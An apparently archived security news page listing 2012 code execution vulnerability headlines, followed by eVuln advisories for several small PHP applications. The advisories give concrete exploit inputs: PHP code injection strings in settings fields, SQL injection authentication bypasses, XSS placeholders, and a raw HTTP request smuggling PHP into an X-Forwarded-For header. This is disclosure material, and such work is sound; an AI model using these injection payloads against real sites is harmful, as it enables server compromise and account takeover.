Recent PHP Code Execution vulnerabilities
Latest information about Code Execution vulnerabilities
22.02.2012 14:37 security MS12-014 - Important : Vulnerability in Indeo Codec Could Allow Remote Code Execution (2661637) - Vers... details >>
22.02.2012 14:36 MS12-014 - Important : Vulnerability in Indeo Codec Could Allow Remote Code Execution (2661637) - Version: 1.1: ... details >>
22.02.2012 14:08 Vuln: Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability details >>
22.02.2012 12:45 {Remote} {Vulnerability} TPTI-12-01 : Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulne... details >>
22.02.2012 12:45 TPTI-12-01 : Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability: Posted by ZDI D... details >>
22.02.2012 12:45 Microsoft Publisher Memory Object Handler Data Remote Code Execution Vulnerability details >>
22.02.2012 00:32 Microsoft Windows Bluetooth Stack Remote Code Execution Vulnerability details >>
21.02.2012 15:29 Microsoft DirectX WAV and AVI File Parsing Remote Code Execution Vulnerability details >>
21.02.2012 12:29 Vuln: 7T TERMIS DLL Loading Arbitrary Code Execution Vulnerability details >>
21.02.2012 08:29 Microsoft VBScript and JScript Scripting Engines Remote Code Execution Vulnerability details >>
21.02.2012 05:29 Microsoft PowerPoint List Value Parsing Remote Code Execution Vulnerability details >>
20.02.2012 22:53 Microsoft Office Malformed Malformed PICT Filter Remote Code Execution Vulnerability details >>
20.02.2012 21:36 MS12-013: Vulnerability in C Run-Time Library could allow remote code execution details >>
20.02.2012 20:36 Microsoft Windows Media Player Remote Skin Header Code Execution Vulnerability details >>
20.02.2012 16:36 Microsoft Office WPG Image File Remote Code Execution Vulnerability details >>
20.02.2012 13:36 Microsoft Excel Indexing Validation Remote Code Execution Vulnerability details >>
20.02.2012 12:36 Microsoft Excel Index Array Remote Code Execution Vulnerability details >>
20.02.2012 11:36 Microsoft Excel Record Parsing Remote Code Execution Vulnerability details >>
20.02.2012 11:36 Security MS-Bulletin: MS12-013 - Critical : Vulnerability in C Run-Time Library Could Allow Remote Code Execution (... details >>
20.02.2012 10:36 Microsoft PowerPoint Picture Index Remote Code Execution Vulnerability details >>
Code Execution vulnerabilities Archive 2011
Here is short summary of recent PHP Code Execution vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.
PHP Code Execution in Alguest.
Description.
It is possible to inject and execute arbitrary PHP code
All options values are written to dati/vars.php file. These values dont pass through any sanitation filter.
Vulnerable script: opzioni.php
Exploit.
All user-defined options may be used for php code injection and execution.
Password: 12345"; echo "PHP Code"; $aaa="
Solution
Solution is not available.
Other details >>SQL Injection and PHP Code Insertion in Pro Publish.
Description.
Vulnerable scripts: admin/login.php cat.php search.php art.php
Parameters email(login.php), password(login.php), find_str(search.php), artid(art.php), catid(cat.php) are not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
An intruder can get login and password of administration area using SQL Injection.
Administrator has an ability to edit some settings. Those values don't pass any sanitation before being saved in set_inc.php script. This can be used to make PHP code insertion.
System access is possible.
Exploit.
URL: http://[host]/cat.php?catid=999 or 1/*
URL: http://[host]/index.php
Searchengine: %' or 1/*
URL: http://[host]/admin/setup.php
Webmaster email: "; [PHP_code] $aaa="
Solution
Solution is not available.
Other details >>XSS and PHP Code Insertion in N.T..
Description.
Vulnerable Script: index.php
Parameter username is not properly sanitized. This can be used to post arbitrary HTML or web script code. This code will be executed when administrator will visit "Login Log" page.
Administrator's session is threatened.
Administrator has an ability to edit variables in ticker.db.php file. Script dont make any sanitation of entered values. This can be used to insert arbitrary PHP code.
System access is possible.
Exploit.
URL: http://[host]/index.php
Username: [XSS]
Password: any
URL: http://[host]/index.php?id=editticker
Ticker width: 100"; [PHP_CODE] $aaa="
Solution
Solution is not available.
Other details >>XSS and PHP Code Insertion Vulnerabilities in QLnews.
Description.
Vulnerable Script: news.php
Parameters autorx, newsx are not properly sanitized. This can be used to post arbitrary HTML or web script code.
Administrator has an ability to edit variable values in config.php file. This can be used to insert arbitrary PHP code into config file which executes by every php-script.
System access is possible.
Condition: magic_quotes_gpc = off
Exploit.
URL: http://[host]/qlnews/news.php?a=write&nr=1&opcja=1&wybor=1
Autor: [XSS]
Tresc: [XSS]
URL: http://[host]/qlnews/admin.php?a=settings
Number of news on main page: 5"; [php_code] $aa="
Solution
Solution is not available.
Other details >>PHP Code Execution and Multiple XSS in FreeForum.
Description.
Vulnerable Script: func.inc.php
Variables $_SERVER[HTTP_X_FORWARDED_FOR] $_SERVER[HTTP_CLIENT_IP] are not sanitized before being written into 'Data/flood.db.php' file. This can be used to inject arbitrary PHP code by posting HTTP query with fake X-Forwarded-For or Client-ip values.
System access is possible.
Vulnerable Script: func.inc.php
Variables $name $subject are not properly sanitized. This can be used to post message with arbitrary HTML or JavaScript code.
Exploit.
HTTP Query:
- POST /freeforum/index.php HTTP/1.0
- Host: [host]
- X-Forwarded-For: anyIP<? [code] ?>
- Content-Length: 91
- name=qqq&email=qqq@qqq.com&subject=qqq&text=qqq&mode=postanswer&thread=1&cat=1&submit=Add
URL: http://[host]/freeforum/index.php
Your name: [XSS]
Subject: [XSS]
Solution.
Vendor-provided solution is available now.
Install or Upgrade to version 1.2.1
http://soft.zoneo.net/freeForum/changes.php
Other details >>